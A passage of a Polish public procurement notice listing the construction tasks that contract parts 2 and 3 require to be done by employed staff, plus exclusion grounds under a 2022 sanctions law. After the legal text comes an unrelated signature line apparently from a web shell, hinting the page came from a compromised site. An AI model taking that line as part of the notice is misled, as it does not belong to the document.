opaski wokół budynku z kostki betonowej;<br/>j) czynności związane z pracami wykończeniowymi.<br/>1.2. W ramach części nr 2 Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub<br/>Podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia:<br/>a) czynności związane z obsługą ciężkiego sprzętu budowlanego, tj. m.in.: koparka, ładowarka, koparko-ładowarka,<br/>samochód ciężarowy;<br/>b) czynności związane z wykonaniem konstrukcji i pokrycia dachu;<br/>c) czynności związane z wykonaniem obróbek blacharskich;<br/>d) czynności związane z dociepleniem ścian styropianem metodą lekką-mokrą;<br/>e) czynności tynkarskie;<br/>f) czynności związane z montażem stolarki okiennej;<br/>g) czynności związane z montażem stolarki drzwiowej;<br/>h) czynności związane z wykonywaniem opaski wokół budynku z kostki betonowej;<br/>i) czynności związane z pracami wykończeniowymi;<br/>1.3. W ramach części nr 3 Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub<br/>Podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia:<br/>a) czynności związane z obsługą ciężkiego sprzętu budowlanego, tj. m.in.: koparka, ładowarka, koparko-ładowarka,<br/>samochód ciężarowy;<br/>b) czynności związane z wykonaniem konstrukcji i pokrycia dachu;<br/>c) czynności związane z wykonaniem obróbek blacharskich;<br/>d) czynności związane z dociepleniem ścian styropianem metodą lekką-mokrą;<br/>e) czynności tynkarskie;<br/>f) czynności związane z montażem stolarki okiennej;<br/>g) czynności związane z montażem stolarki drzwiowej;<br/>h) czynności związane z wykonywaniem opaski wokół budynku z kostki betonowej;<br/>i) czynności związane z pracami wykończeniowymi.<br/>2. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców w przypadkach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022, poz. 835). Do Wykonawców podlegających wykluczeniu w tym zakresie, stosuje się art. 7 ust. 3 wspomnianej ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com